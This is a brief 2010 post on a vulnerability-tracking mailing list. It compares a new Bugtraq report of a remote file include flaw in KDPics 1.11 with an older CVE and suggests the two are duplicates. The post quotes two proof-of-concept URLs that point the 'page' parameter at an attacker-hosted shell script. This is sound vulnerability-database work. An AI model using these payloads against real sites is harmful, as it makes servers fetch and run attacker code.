[VIM] KDPics 'index.php3' Remote File Include Vulnerability

George A. Theall theall at tenable.com
Mon Aug 9 09:15:21 CDT 2010


Bugtraq 42312 was just released to cover a remote file include in  
KDPics version 1.11, apparently reported by Fl0riX and covered by http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt 
. The PoC looks similar to one reported by Mr_KaLiMaN in 2006 and  
covered by CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:

   site/index.php3?page=http://fl0rix/shell.txt?

versus:

   http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?

Looks like another dup to me. Rob?


George
-- 
theall at tenablesecurity.com





More information about the VIM mailing list